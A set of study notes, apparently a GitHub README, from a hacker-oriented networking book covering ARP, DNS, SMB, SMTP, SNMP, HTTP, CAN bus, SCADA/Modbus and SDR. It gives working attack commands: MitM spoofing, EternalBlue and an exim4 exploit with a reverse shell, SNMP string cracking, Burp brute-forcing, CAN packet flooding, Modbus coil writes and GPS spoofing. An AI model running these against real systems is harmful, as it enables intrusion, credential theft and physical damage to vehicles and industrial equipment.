MitM:     Victim ──► Attacker ──► Gateway ──► Internet
                      └── reads/alters traffic

Tools for ARP MitM

# Ettercap (GUI + CLI)
ettercap -T -q -i eth0 -M arp /victim_IP/ /gateway_IP/

# arpspoof (dsniff suite)
arpspoof -i eth0 -t <victim_IP> <gateway_IP>

# driftnet — view victim's images in real-time
driftnet -i eth0

ARP via Metasploit Meterpreter

After compromising a host, use ARP to pivot and discover other targets:

# In meterpreter session
run post/multi/gather/arp_scanner RHOSTS=192.168.1.0/24

Sends gratuitous ARP requests → discovers all hosts on the network → find valuable targets (file server, DB server).

⚡ Exercises

Use arp -a to view your ARP table.
Use netdiscover to find other hosts on your LAN.
Create a Wireshark filter to view only ARP packets.

Chapter 8 — Domain Name Service (DNS)

What is DNS?

DNS translates human-readable domain names → machine-readable IP addresses.

www.hackers-arise.com  →  23.236.62.147

Without DNS you'd have to memorize IP addresses of every website. DNS makes the internet usable.

Domain Name Hierarchy

              . (root)
              │
         ┌────┴────┐
        .com      .org ...
         │
    ┌────┴────┐
  redhat    hackers-arise
    │
 ┌──┴──┐
sales  eng

TLD = Top Level Domain (.com, .org, .edu)
SLD = Second Level Domain (hackers-arise, redhat)
Subdomain = left of SLD (sales.redhat, engineering.redhat)
FQDN = Fully Qualified Domain Name = full path from root (www.hackers-arise.com.)

The Hosts File

Before DNS, a single text file mapped names → IPs.
Still present on every system — and takes precedence over DNS queries.

# Linux
sudo mousepad /etc/hosts      # Open hosts file

Example hosts file:

127.0.0.1        localhost
192.168.1.1      router.local
192.168.1.114    bankofamerica.com    # DNS spoofing via hosts file!

🎯 Attack: Add a line to /etc/hosts to redirect a domain to your malicious server. All local DNS queries for that domain will hit your IP instead.

How DNS Works

Client asks: "What is download.beta.example.com?"

1. Client → Local DNS Server → "I don't know"
2. Local DNS → Root Server → "Try the .com TLD server at X.X.X.X"
3. Local DNS → .com TLD Server → "Try example.com authoritative server at Y.Y.Y.Y"
4. Local DNS → example.com Auth Server → "beta.example.com = Z.Z.Z.Z"
5. Local DNS → Client → "Z.Z.Z.Z"
6. Client caches result for future use

DNS is distributed and hierarchical — resistant to single-server failures.

DNS Components

Component	Description
DNS Cache	Previously resolved names stored locally (faster, no traffic)
Resolvers	Any client that needs to look up DNS (your computer)
Name Servers	Databases containing name→IP mappings
Name Space	The full database of IP addresses and names

DNS Record Types

Record	Purpose	Example
A	Domain → IPv4 address	`hackers-arise.com → 23.236.62.147`
AAAA	Domain → IPv6 address
CNAME	Alias → another domain	`www → hackers-arise.com`
MX	Mail server for domain	Must point to domain, not IP
NS	Authoritative name server
PTR	IP → hostname (reverse DNS)
SOA	Start of Authority — first record in zone file
TXT	Arbitrary text (SPF, DMARC, verification)

DNS Uses UDP (not TCP)

Queries use UDP port 53 — fast, lightweight
Zone transfers use TCP port 53 — reliable for full DB sync

# Look up DNS records
dig hackers-arise.com
dig hackers-arise.com MX          # Mail records
dig hackers-arise.com NS          # Name server records
nslookup hackers-arise.com        # Alternative tool

DNS Security & Vulnerabilities

DNS Spoofing / Cache Poisoning

Inject false DNS records into a resolver's cache → redirect traffic to attacker's server.

# Tool: dnsspoof (intercept local DNS queries on LAN)
dnsspoof -i eth0 -f spoofhosts

Zone Transfer Attack

If misconfigured, an attacker can download the entire DNS zone (all records).

# Attempt zone transfer
dig axfr @<dns-server> <domain>

DoS Against DNS

DNS DoS = especially devastating because it makes the whole internet unusable (can't resolve anything).

Iranian Hackers DNS Attack (2019)

Attackers used 3 techniques:

Changed DNS A records via managed DNS provider credentials
Changed DNS NS records via TLD provider credentials
Deployed an "attacker operations box" — internal queries → malicious server, external → real server

DNSSec

DNS Security Extensions — adds digital signatures to DNS responses.

Each DNS zone has a public/private key
Resolvers use the public key to verify data authenticity
Prevents zone transfer poisoning and data alteration

Without DNSSec: DNS is based on UDP (connectionless) — easily spoofed.

Building a BIND DNS Server

BIND = Berkeley Internet Domain System — most widely used DNS server on the internet.

# Install
sudo apt-get install bind9
# or from source:
git clone https://gitlab.isc.org/isc-projects/bind9.git

# Configuration files at /etc/bind/
# named.conf.options  — global settings
# named.conf.local    — zone definitions

# Edit options
sudo leafpad /etc/bind/named.conf.options
# Set: listen-on port 53; allow-query; forwarders; recursion yes;

# Create forward zone file
cp /etc/bind/db.local /etc/bind/forward.yourdomain.local

# Create reverse zone file
cp /etc/bind/db.127 /etc/bind/reverse.yourdomain.local

# Restart service
sudo service bind9 restart
sudo systemctl restart bind9

⚡ Exercises

Open your hosts file with a text editor.
Build a BIND DNS server for your local domain.
Search the CVE database for recent DNS vulnerabilities.

Chapter 9 — Server Message Block (SMB)

What is SMB?

SMB (Server Message Block) — Application layer (Layer 7) protocol for:

File sharing
Printer sharing
Named pipe sharing
Port sharing

Client-server, request-response protocol. Enables users/apps to share resources across a LAN.
SMB over TCP/IP uses port 445.

Originally developed by IBM (1980s), adopted and extended by Microsoft for Windows.

Client ──── request ────► SMB Server
Client ◄─── response ─── SMB Server
(via TCP/IP or NetBIOS)

CIFS vs SMB

Term	Description
SMB	The protocol (current: SMB 2.0, 3.0)
CIFS	Common Internet File System — old Microsoft dialect of SMB (obsolete)

SMB 2.0 → introduced with Windows Vista (2006)
SMB 3.0 → introduced with Windows 8 and Server 2012

SMB Vulnerabilities

SMB has been the source of two of the most critical Windows vulnerabilities in history:

Exploit	CVE	Impact
MS08-067	CVE-2008-4250	Remote code execution — Windows XP/Server 2003. Compromised millions.
EternalBlue	MS17-010	NSA-developed exploit. Used by WannaCry and Petya ransomware.

Both allow attackers to send crafted packets to SMB → execute remote code with SYSTEM privileges.

# Search Metasploit for SMB exploits
msf > search type:exploit smb

# Use EternalBlue
msf > use exploit/windows/smb/ms17_010_eternalblue
msf > set RHOSTS <target-IP>
msf > run

Building a Samba Server (Linux SMB)

Samba = Linux/Unix implementation of SMB. Lets Linux share files with Windows systems.

# Install
sudo apt-get install samba

# Start service (daemon name is "smbd")
sudo service smbd start

# Configure — edit /etc/samba/smb.conf
sudo leafpad /etc/samba/smb.conf

Add to the end of smb.conf:

[HackersArise_share]
   comment = Samba on Hackers-Arise
   path = /home/OTW/HackersArise_share
   read only = no
   browsable = yes

# Create the shared directory
sudo mkdir /home/OTW/HackersArise_share

# Give all users access
sudo chmod 777 /home/OTW/HackersArise_share

# Restart to apply changes
sudo service smbd restart

Access from Windows:

\\192.168.1.101\HackersArise_share

Metasploit SMB Search

msf > search type:exploit smb

Notable exploits in the list:

exploit/windows/smb/ms08_067_netapi — MS08-067 (Windows XP/Server 2003)
exploit/windows/smb/ms17_010_eternalblue — EternalBlue (Windows 7/Server 2008)
Multiple Samba exploits for Linux

⚡ Exercises

Build a Samba server and share a directory on your LAN.

Chapter 10 — SMTP (Simple Mail Transfer Protocol)

What is SMTP?

SMTP (Simple Mail Transfer Protocol) — transfers email between users.
First codified in 1983. Still the same core protocol today (with enhancements).

Email Port Map

Port	Protocol	Use
25	SMTP	Server-to-server (MTA ↔ MTA)
587	SMTP	Client submission (MUA → MSA)
110	POP3	Download email from server
143	IMAP	Access email on server

Email Processing Model

[Sender: Ana]                                    [Receiver: Lav]
    │                                                  │
   MUA (Outlook/Thunderbird)                      MUA (reads email)
    │ SMTP port 587                                    │
   MSA/MTA (mail server)                         MDA (local delivery)
    │ SMTP port 25                                     │
    └──────────────────────────────────────────► MTA (target mail server)
                   (MTA uses DNS MX lookup to find target)

Key agents:

Agent	Name	Role
MUA	Mail User Agent	Email client (Outlook, Thunderbird)
MSA	Mail Submission Agent	Accepts email from MUA
MTA	Mail Transfer Agent	Routes email between servers
MDA	Mail Delivery Agent	Delivers to local recipient mailbox

Popular Linux MTAs: sendmail, EXIM, postfix
Windows: Microsoft Exchange Server

SMTP Communication Flow (Wireshark)

Packet 1-3:  TCP 3-way handshake (client → SMTP server)
Packet 4:    Server identifies itself + SMTP banner
Packet 5:    Client sends EHLO (initiate SMTP session)
Packet 8:    Client identifies sender (MAIL FROM)
Packet 10:   Client identifies receiver (RCPT TO)
...          DATA → message content → . (end)

Building an SMTP Server (Exim4)

# Install exim4
sudo apt install exim4

# Run configuration wizard
sudo dpkg-reconfigure exim4-config

Wizard questions:

Mail server type → "internet site" (send/receive across internet)
Domain name → your domain (e.g. hackers-arise.com)
IP to listen on → your server IP
Local recipient domains → leave as default
Relay domains → leave blank
Local mail delivery → mbox or home directory
Minimize DNS lookups → YES
Relay domains → leave blank
Split config file → NO (unsplit = more stable)

# Start exim4
sudo service exim4 start

SMTP Reconnaissance

# Scan SMTP port with service detection
nmap -sT -A 192.168.56.103 -p25

# Run all SMTP nmap scripts (user enumeration, vuln scan)
nmap --script=smtp-* 192.168.56.103 -p 25

Output may show:

Users enumerated (for social engineering)
CVE vulnerabilities (e.g. CVE-2010-4344 for exim4)

Exploiting SMTP with Metasploit

# Launch Metasploit
msfconsole

# Search for exim exploits
msf5 > search type:exploits exim

# Use the exim4 string format exploit
msf5 > use exploit/unix/smtp/exim4_string_format

# Get exploit info
msf5 > info

# Set target
msf5 > set RHOSTS 192.168.56.103

# Set payload (reverse Perl shell)
msf5 > set PAYLOAD cmd/unix/reverse_perl

# Set callback port (443 = HTTPS port, often allowed through firewalls)
msf5 > set LPORT 443
msf5 > set LHOST <your-IP>

# Fire!
msf5 > exploit

If successful → you get a shell session. Verify with Linux commands:

id         # Should show uid=0 (root)
whoami     # root
pwd        # /var/spool/exim4
uname -a   # System info

Note: Linux shells from Metasploit have NO prompt — just an empty line. Type commands anyway.

Notable SMTP Vulnerabilities

Year	Target	Impact
2021	Microsoft Exchange Server	Chinese hackers accessed large corps' email (FBI authorized to patch US systems)
2020	Exim mail servers	Two severe vulns allowing unauthorized email access

⚡ Exercises

Build an SMTP server (Exim4) for your domain.
Run nmap --script=smtp-* against your new server and review the output.

Chapter 11 — SNMP (Simple Network Management Protocol)

What is SNMP?

SNMP manages and monitors network devices (routers, switches, printers, servers).
If an attacker gains access to SNMP, they can:

Harvest vast information about every device on the network
Disable or reconfigure routers and switches
Unmask encrypted VPN communications (NSA ExtraBacon exploit)

Uses UDP ports 161 and 162.

SNMP Architecture

           SNMP Manager (admin computer)
               │  UDP 161/162
    ┌──────────┼──────────┐
    ▼          ▼          ▼
 [Router]  [Switch]  [Server]   ← each runs an SNMP Agent
    └──────────┴──────────┘
              MIB
   (Management Information Base)
   Contains: users, software, OS, open ports, configs...

The MIB = hierarchical database holding everything about every managed device.

SNMP Versions

Version	Security	Notes
SNMPv1	Very poor	Cleartext. Default community strings: `public` (read) / `private` (write). Still widely used.
SNMPv2	Slightly better	Not backward-compatible → not widely adopted
SNMPv3	Strong	Encryption + integrity + auth. Not yet universal

⚠️ Even if strings are changed, SNMPv1 is cleartext — sniff the wire to grab them.

SNMP PDU Types

PDU	Purpose
GetRequest	Request info from agent
SetRequest	Set a value on agent
GetNextRequest	Walk through MIB
GetBulkRequest	Get large chunks
Response	Agent reply
Trap	Unsolicited agent alert
InformRequest	Manager to manager

Abusing SNMP — snmpcheck

# Dump MIB info (default: public string, SNMPv1)
snmpcheck -t <target-IP>

# Custom community string
snmpcheck -t <target-IP> -c <community-string>

Output includes:

Hardware info
OS + uptime (check if patched)
Storage info
User accounts (use for password attacks)
Software installed (find exploitable versions)

Cracking SNMP Community Strings — onesixtyone

# View built-in dictionary
cat /usr/share/doc/onesixtyone/dict.txt

# Crack community string
onesixtyone 192.168.1.102 -c /usr/share/doc/onesixtyone/dict.txt

If found, use the cracked strings with snmpcheck to pull the full MIB.

💡 Tip: Add company-name variations to your wordlist — lazy admins often use company-related strings.

NSA ExtraBacon

Snowden documents confirmed NSA exploited SNMP to unmask encrypted Cisco VPN traffic. Patched by Cisco, but the NSA likely has further SNMP-based exploits.

Quick Reference

snmpcheck -t <IP>                          # Dump MIB
onesixtyone <IP> -c dict.txt               # Crack community string
nmap -sU -p 161 <IP>                       # Check SNMP port
nmap -sU -p 161 --script=snmp-info <IP>    # SNMP info via nmap

Chapter 12 — HTTP

HTTP Protocol

HyperText Transfer Protocol — core communication protocol of the web.
Message-based: client sends request, server sends response. Connection-less but uses TCP.

HTTP Request Structure

GET /index.html HTTP/1.1          ← Method + URL + Version
Host: www.example.com             ← Headers
User-Agent: Mozilla/5.0
Accept: text/html
                                  ← Blank line
                                  ← Optional body

First line elements:

Method (GET, POST, etc.)
URL
HTTP version

HTTP Methods

Method	Purpose
GET	Retrieve a resource
POST	Submit data / perform actions
HEAD	Like GET but no body returned
PUT	Upload a resource
OPTIONS	Ask server what methods are available
TRACE	Diagnostic — echoes request back

HTTP Status Codes

Code	Category	Common Examples
1xx	Informational	100 Continue
2xx	Success	200 OK, 201 Created
3xx	Redirect	301 Moved Permanently, 302 Found, 304 Not Modified
4xx	Client Error	400 Bad Request, 401 Unauthorized, 403 Forbidden, 404 Not Found
5xx	Server Error	500 Internal Server Error, 503 Service Unavailable

HTTP Headers (Key Ones)

Request Headers

Header	Purpose
`Host`	Target hostname
`User-Agent`	Browser/client identifier
`Cookie`	Submits stored cookies
`Authorization`	Submits credentials
`Referer`	URL of referring page
`Accept`	Content types accepted

Response Headers

Header	Purpose
`Set-Cookie`	Issues cookie to client
`Server`	Web server software (e.g. Apache, nginx)
`Location`	Redirect target (3xx responses)
`WWW-Authenticate`	Auth type supported
`Content-Type`	MIME type of body
`X-Frame-Options`	Clickjacking protection

Cookies

Server issues via Set-Cookie response header
Client stores and sends back on future requests
Used to maintain session state (e.g. logged-in status)
Name/value pairs, no spaces

Set-Cookie: Tracking=wdr66gyU34pli89
Cookie: Tracking=wdr66gyU34pli89      ← client sends back next request

🎯 Attack: Steal cookies → impersonate user (session hijacking). Use Wireshark or BurpSuite to intercept.

URL Structure

protocol://hostname[:port]/[/path/]file[?param=value]

https://www.hackers-arise.com:443/login?user=admin
  │          │                │    │        │
  protocol   hostname         port path     parameter

Port is optional — only needed if different from default (http=80, https=443).

HTTPS

HTTP tunneled over SSL/TLS → encrypted → protects confidentiality and integrity.
Without HTTPS, traffic is cleartext → vulnerable to MitM interception.

HTTP Authentication Types

Type	Method
Basic	Base64-encoded credentials in header (NOT encrypted — easily decoded)
NTLM	Challenge-response mechanism
Digest	Challenge-response using MD5 + nonce

HTTP Proxies

A proxy sits between client browser and web server:

Browser → Proxy → Internet → Web Server
Browser ← Proxy ← Internet ← Web Server

Used for: access control, caching, authentication, content filtering.
BurpSuite acts as an intercepting proxy for web app hacking.

Hacking Web App Authentication — BurpSuite

Setup

Launch BurpSuite (built into Kali): burpsuite &
Create Temporary Project → Use Burp Defaults → Start Burp
Enable Proxy → Intercept
In Firefox: Preferences → Network → Manual proxy → 127.0.0.1:8080

Attack 1 — Sniper (Known Username)

Target: Crack the password for a known username

1. Browse to login page (e.g. DVWA)
2. Enter any username + password → BurpSuite intercepts request
3. Right-click → Send to Intruder
4. Positions tab → Clear → highlight password field → Add
5. Attack type: Sniper
6. Payloads tab → add password list (top10000passwords.txt)
7. Start Attack
8. Look for a response with different Status or Length → successful login!

Attack 2 — Cluster Bomb (Unknown Username & Password)

Target: Crack both username AND password

1. Same setup, but highlight BOTH username and password fields
2. Attack type: Cluster Bomb
3. Payload Set 1: username wordlist
4. Payload Set 2: password wordlist + enable Character Substitution
   (a=4, b=8, e=3 etc. — common "l33t speak" substitutions)
5. Start Attack → looks through all combinations
6. ~2 billion attempts — look for Status 200 or different Length

Character substitution munges passwords to handle common letter-number substitutions users make.

Reading results: All failed attempts = same Status code (302) + same Length. Successful login = different Status (200) or different Length.

⚡ Quick Reference

HTTP ports:  80 (HTTP)  443 (HTTPS)
Proxy:       127.0.0.1:8080 (BurpSuite default)
DVWA:        Deliberately Vulnerable Web App (practice target)
OWASP BWA:  OWASP Broken Web Apps VM (practice target)

Chapter 13 — Automobile Networks (CAN Bus)

The CAN Protocol

CAN (Controller Area Network) — the dominant protocol for in-vehicle communication between microcontrollers, sensors, gauges, actuators.

Developed by Robert Bosch GmbH (Germany), released at SAE meeting 1986
Standardized as ISO 11898-1 and ISO 11898-2
Designed for robust communication without a host computer
Operates like a broadcast network — every node sees every message
Runs over two wires: CAN High and CAN Low (differential signaling)
No security — no encryption, no authentication

CAN Message Types

Type	Purpose
Data Frame	Only frame used for actual data transmission
Remote Frame	Destination node requests data from source
Error Frame	Signals an error on the bus
Overload Frame	Signals internal overload condition

CAN Packet Structure (Standard)

┌──────────────┬───────────┬──────────────────┬───────────┐
│ Arbitration  │ Identifier│ Data Length Code │   Data    │
│     ID       │ Extension │   (DLC: 0-8B)   │ (up to 8B)│
└──────────────┴───────────┴──────────────────┴───────────┘

Arbitration ID — ID of the sending device
No source address in packet — spoofing is trivial
Extended CAN packets: same structure but chained for longer IDs (backward compatible)

Security Issues

No encryption → MitM attacks possible
No authentication → anyone can spoof messages
Broadcast → every node sees every packet
Some manufacturers added auth for mission-critical systems (brakes, software updates) but not all

OBD-II Connector

Every modern car has an OBD-II port (under the dashboard) — 16 pins.
Mechanics connect computers here to read diagnostic data.
Hackers can too — connect here to send messages on the CAN bus.

can-utils (SocketCAN)

Linux tools for communicating with CAN networks. Contributed by Volkswagen Research to the Linux kernel.

# Install
sudo apt install can-utils
# or
git clone https://github.com/linux-can/can-utils

Key Tools

Tool	Purpose
`candump`	Display, filter, log CAN traffic
`canplayer`	Replay CAN log files
`cansend`	Send a single CAN frame
`cangen`	Generate random CAN traffic
`cansniffer`	Display CAN data differences
`canlogserver`	Log CAN frames from remote/local host

Setting Up a Virtual CAN Network

# Load vcan kernel module
sudo modprobe vcan

# Create virtual interface
sudo ip link add dev can0 type vcan
sudo ip link set up vcan0

# Verify
ifconfig vcan0

ICSim — CAN Simulator

CAN-Bus simulator by Craig Smith (author of The Car Hackers Handbook).

# Install dependencies
sudo apt-get install libsdl2-dev libsdl2-image-dev -y

# Download ICSim
git clone https://github.com/zombieCraig/ICSim
cd ICSim

# Set up virtual CAN
./setup_vcan.sh

# Start the instrument panel (speedometer, doors, signals)
./icsim vcan0

# Start the controller
./controls vcan0

Sniffing CAN Traffic

# Colorized live CAN traffic
cansniffer -c vcan0

# Filter for a specific Arbitration ID
cansniffer -c vcan0
# then type:
-000000    # (masks everything)
+161       # (show only ID 161)

# Capture and log to file
candump -c -l vcan0

# Capture + view + ASCII output simultaneously
candump -c -l -s 0 -a vcan0

Replaying CAN Traffic

# Replay a captured log file
canplayer -I candump-XXXXXXXXXX.log

Sending Custom CAN Frames — cansend

# Format: cansend <interface> <ArbitrationID>#<data>
cansend vcan0 161#000005500108000d

Reverse Engineering — Accelerate the Car

Goal: Find which CAN packet accelerates the vehicle to 100 mph.

# Step 1: Start sniffer
cansniffer -c vcan0

# Step 2: Press UP arrow in controller → accelerate to 100mph
# Watch for rapidly changing values (shown in red) → likely candidates

# Step 3: Filter for suspected ID
-000000
+244

# Step 4: Record the values at 100mph

# Step 5: Replay that packet
cansend vcan0 244#0000003812

# Step 6: If single packet isn't enough (normal CAN packets override it),
# flood with continuous packets
while true; do cansend vcan0 244#0000003812; done
# Car accelerates to 100mph — ghost in the machine!

Key Fob Hacking — SARA

PKES (Passive Keyless Entry and Start) — proximity unlocking/starting. Introduced 1999.

SARA = Signal Amplification Relay Attack

Normal:  Key fob (LF signal) ──────────────► Car (nearby, ~10cm)

Attack:  Key fob ──► Emitter ──(amplified RF)──► Receiver ──► Car
         (fob is inside house)                   (near car)

Signal is relayed (amplified) across distance → car thinks fob is nearby → unlocks
No need to decrypt — just relay the encrypted signal (like pass-the-hash)
Works on most cars before 2014, Honda cars up to 2021

Required hardware: 2 RF transceivers (emitter + receiver) operating at ~2.5GHz

⚡ Exercises

Download can-utils.
Download ICSim.
Create a virtual CAN network (vcan0).
Replicate the CAN replay attack from this chapter.

Chapter 14 — SCADA/ICS Networks

What is SCADA/ICS?

SCADA = Supervisory Control and Data Acquisition
ICS = Industrial Control Systems

Controls physical infrastructure: petroleum refineries, manufacturing, water/sewage plants, electric grid, pipelines.

Key difference from IT systems: many proprietary protocols, not just TCP/IP.

Major SCADA Manufacturers

Siemens
Honeywell
Toshiba
Rockwell Automation / Allen-Bradley
Mitsubishi
GE
Schneider Electric

Each uses varied (sometimes proprietary) protocols — security through obscurity has historically protected them. That era is ending.

SCADA Communication Protocols

Protocol	Notes
Modbus	Most widely used. Original from 1979.
DNP3	Utility/energy sector
ICCP	Inter-control center comms
CIP / EtherNet/IP	Rockwell/Allen-Bradley
CompoNet / ControlNet / DeviceNet	Industrial networks
OPC	OLE for Process Control
PROFIBUS	Process Field Bus
Foundation Fieldbus H1	Process automation

Modbus — The Most Important Protocol

Modbus RTU (Serial)

Developed 1979 by Modicon (now Schneider Electric)
Operates at OSI Layer 7
Lightweight, simple, request/reply model
Data limit: 253 bytes
Up to 32 devices on a serial link, each with unique ID
Master/Slave architecture — only master initiates queries

Master → query (slave ID, function code, data, checksum) → Slave
Master ← response ← Slave

Modbus TCP

Modbus protocol encapsulated in TCP/IP
Same function codes + request/reply
Port 502
Adds 7-byte MBAP header (2 header + 2 protocol ID + 2 length + 1 unit ID)
Removes CRC checksum (TCP handles integrity)

Modbus Function Codes

Code	Function
01	Read Coil Status
02	Read Input Status
03	Read Holding Registers
04	Read Input Registers
05	Force Single Coil
06	Preset Single Register
08	Diagnostics
15	Force Multiple Coils
16	Preset Multiple Registers

Function Code 8 — Diagnostics:
Sub-function 04 = Force Listen Only Mode → can create a DoS on Modbus devices.

Modbus Security Problems

Issue	Impact
No authentication	Anyone with a valid packet can control devices
No encryption	All traffic in cleartext — sniffable
No checksum (TCP)	Attacker can spoof packets
No broadcast suppression	Flood of messages = DoS

Finding SCADA with Shodan

Search on shodan.io: TM221

Returns IP addresses of Schneider Electric TM221 PLCs exposed to the internet.
Many are vulnerable and unpatched.

Hacking Modbus with modbus-cli

# Install
gem install modbus-cli

# Help
modbus --help

Address Terminology (Schneider Electric)

Schneider Notation	Modicon Notation	Type
`%MW100`	`400101`	Holding Register
`%M0`	`101`	Coil (Boolean ON/OFF)

Reading Values

# Read 10 holding registers starting at %MW100
modbus read <IP> %MW100 10

# Read 10 coils (Boolean values) starting at 101
modbus read <IP> 101 10

# Save 100 values to file
modbus read --output scadaoutput.txt <IP> %MW100 100

Writing Values

# Turn on 10 coils (set all to 1)
modbus write <IP> %MW100 1 1 1 1 1 1 1 1 1 1

# Verify
modbus read <IP> %MW100 10

🎯 Impact: Writing to coils/registers can physically control industrial equipment — valves, motors, breakers, actuators.

Real-World Context

OTW notes this tool was used during the Ukraine/Russia war to disrupt Russian industrial systems.

SCADA/ICS hacking in cyber warfare can:

Disable power grids
Disrupt water treatment
Sabotage manufacturing
Create physical destruction (cf. Stuxnet against Iranian centrifuges)

⚡ Key Commands Summary

gem install modbus-cli                              # Install
modbus read <IP> %MW100 10                         # Read 10 registers
modbus read <IP> 101 10                            # Read 10 coils
modbus write <IP> %MW100 1 1 1 1 1 1 1 1 1 1      # Write to registers
modbus read --output out.txt <IP> %MW100 100       # Save to file

Chapter 15 — Radio Frequency (RF) Networks & SDR

Why RF for Hackers?

RF signals are everywhere and largely unsecured:

Car key fobs, garage doors, wireless switches
Aircraft communication (ATC)
Aircraft position (ADS-B)
Pager messages (often unencrypted)
Cellular (2G/3G/4G)
Police and military comms
Satellite signals
SCADA remote terminal units
GPS signals

Many have little or no security. Those that do are often vulnerable to replay attacks (no timestamps/randomization).

Basic Radio Terminology

Term	Definition
Amplitude	Strength of the radio signal
Frequency (Hz)	Cycles per second of radio waves
Sample Rate	Rate at which analog data is captured digitally (Hz)
Filter	Removes noise and interference from signals
DSP	Digital Signal Processing — analyze/modify signals via software

Radio Attack Methods

Method	Description
Sniffing	Passively capture and study RF traffic
Replay	Record and retransmit a signal (no timestamps → works on many systems)
Signal Deception	Spoof a valid signal (need to know packet structure + keys)
Signal Hijacking	Pull target onto fake network (femtocell, Stingray)
DoS	Jam or flood signals to block communication

SDR Hardware Comparison

Hardware	Price	Tx/Rx	Frequency	Best For
RTL-SDR	~$35	Rx only	500kHz–1.75GHz	Beginners, listening only
HackRF One	~$300	Half-duplex	1MHz–6GHz	Replay attacks, beginner Tx
BladeRF	~$400	Full-duplex	to 3.8GHz	High-performance
LimeSDR	~$300	Full-duplex	varies	Apps-enabled, broadest support
USRP	$500+	Full-duplex	varies	Research & development

Recommendation:
Starting out → RTL-SDR (~$35, receive-only)
Need to transmit (replay attacks) → HackRF One
High-performance / full-duplex → BladeRF or LimeSDR

Setting Up RTL-SDR + HDSDR (Windows)

1. Download Zadig from http://zadig.akeo.ie/
2. Install WinUSB driver for RTL device ("Bulk-In, Interface 0")
3. Download HDSDR from http://hdsdr.de/download/HDSDR_install.exe
4. Download ExtIO_RTL2832.DLL → copy to HDSDR install dir
5. Launch HDSDR → select ExtIO_RTL2832.DLL

Sampling Rate

Set via Bandwidth button. For FM radio, ≥48 kHz is sufficient (human ear can't distinguish higher).

Listen to FM Radio

Click FM mode icon
Set Frequency to your local FM station (e.g. 101.5 MHz)
Adjust volume slider

Intercept Aircraft Communications

Aircraft voice comms use AM radio (not FM — AM travels farther):

Band	Frequency	Use
HF	3–30 MHz	Long-range, intercontinental (bounces off ionosphere)
VHF	118–137 MHz	Line-of-sight, high quality (local airport)

1. Open HDSDR
2. Set Mode to "AM", Frequency Manager to "Air"
3. Set sampling rate ≥ 40 kHz (2x max human voice frequency)
4. Google your local airport → find ATC frequencies
   (e.g. Tower: 118.9, Ground: 121.7)
5. Navigate to that frequency → red spike = activity → listen!

Track Aircraft Position — ADS-B with dump1090

Every aircraft broadcasts an ADS-B signal every second containing:

GPS location
Altitude
Ground speed
Aircraft ID

# Install dump1090
sudo git clone https://github.com/antirez/dump1090

# Or use DragonOS (Linux distro designed for SDR)
# https://sourceforge.net/projects/dragonos-focal/

# Navigate to directory
cd dump1090

# Run (raw output)
./dump1090

# Raw data
./dump1090 --raw

# Interactive table (updates per second)
./dump1090 --interactive

# Map overlay in browser (like FlightRadar24 for your area)
./dump1090 --interactive --net
# then open: http://localhost:8080

GPS Spoofing — Hide Your Location

You can spoof your GPS position using HackRF One (must be able to transmit).

# Step 1: Create directory and download GPS spoof software
mkdir GPS_SPOOF && cd GPS_SPOOF
sudo git clone https://github.com/osqzss/gps-sdr-sim.git
cd gps-sdr-sim

# Step 2: Compile (with motion support so spoof appears moving, not static)
sudo gcc gpssim.c -lm -O3 -o gps-sdr-sim -DUSER_MOTION_SIZE=4000

# Step 3: Download today's GPS satellite ephemeris file (requires free registration)
# https://cddis.nasa.gov/archive/gnss/data/daily/YEAR/brdc/

# Step 4: Find GPS coordinates of target location (Google Maps)
# Example: The Kremlin, Moscow = 55.75911, 37.61640

# Step 5: Generate spoofed GPS signal file
sudo ./gps-sdr-sim -b 8 -e brdc0010.22n -l 55.75911,37.61640,100

# Step 6: Transmit with HackRF (GPS frequency = 1575.42 MHz)
sudo hackrf_transfer -t gpssim.bin -f 1575420000 -s 2600000 -a 1 -x 0

# Result: Anyone tracking your GPS signal sees you in the Kremlin!

Real-World RF Attack Scenarios

Target	Attack	Tool
Car key fob	SARA relay attack	RF transceivers
Garage door	Replay attack	HackRF + GNU Radio
Aircraft ATC	Passive interception	RTL-SDR + HDSDR
Aircraft position	ADS-B monitoring	RTL-SDR + dump1090
GPS tracking	GPS spoofing	HackRF + gps-sdr-sim
Pager messages	Sniff unencrypted data	RTL-SDR + multimon-ng
SCADA RTUs	Intercept radio control	SDR + protocol analysis

⚡ Exercises

Install the HDSDR software.
Listen to your local airport ATC communications.
Use RTL-SDR + dump1090 to capture aircraft location and speed data in your area.

Appendix A — Cyberwarrior Wisdom of Master OTW

"Hacking is the new martial art of the 21st century. To become a master hacker, you must think strategically and analytically." — OTW

The 23 Rules

#	Wisdom
1	Fools talk. The wise listen.
2	Hacking is a process, not a technology or collection of tools.
3	Hacking is the ultimate martial art.
4	If a service is free, you are not the customer; you are the product.
5	Only the fool goes to battle without adequate reconnaissance of their enemy.
6	"Listen" closely and intently to your enemy; they will tell you everything you need to know to defeat them.
7	If you believe in nothing, you can be led to believe anything.
8	Every adversary — no matter how strong and powerful — always has a weakness. Find the weakness and exploit it.
9	A great offense might win the battle, but an impregnable defense wins the war.
10	Turn the power and strength of your opponent against them.
11	The battle often goes NOT to the strongest but to the most persistent.
12	There is ALWAYS opportunity in chaos.
13	Avoid your adversary's strengths and attack their weaknesses.
14	Never become predictable.
15	When faced with an adversary of overwhelming power and strength, do not face them head-on. Strike only when you have the element of surprise.
16	Understanding human psychology, motivation, and behavior is one of the hacker's most important tools.
17	A series of persistent, small wins will defeat your opponent.
18	Create confusion and dissension within the ranks of your opponent.
19	At times, it can be advantageous to retreat to lure your opponent into a vulnerable and indefensible position.
20	People on social media are much less than they appear.
21	In cyber war, industrial facilities can be both a target and a weapon.
22	To remain safe and anonymous on the Internet, you must have a thorough and deep understanding of digital forensics.
23	Humility makes you stronger; hubris makes you vulnerable.

Key Themes

On Reconnaissance: Rules 5, 6 — never attack blind. Recon first, always.

On Persistence: Rules 11, 17 — skill matters less than determination and consistency.

On Deception: Rules 14, 15, 18, 19 — unpredictability and misdirection are weapons.

On Psychology: Rules 7, 16, 20 — humans are the weakest link. Understand them.

On Defense: Rules 9, 22 — offense is flashy, but defense wins long-term.

On Ego: Rules 4, 23 — stay humble, stay skeptical.

Name		Name	Last commit message	Last commit date
Latest commit History 2 Commits
README.md		README.md

#	Chapter
1	Network Basics
2	Subnetting & CIDR
3	Network Analysis
4	Linux Firewalls
5	Wi-Fi Networks
6	Bluetooth Networks
7	ARP
8	DNS
9	SMB
10	SMTP
11	SNMP
12	HTTP
13	Automobile Networks
14	SCADA/ICS
15	RF Networks & SDR
A	Appendix — Cyber Warrior Wisdom

Folders and files

Latest commit

History

Repository files navigation

📡 Network Basics for Hackers — Complete Notes

Table of Contents

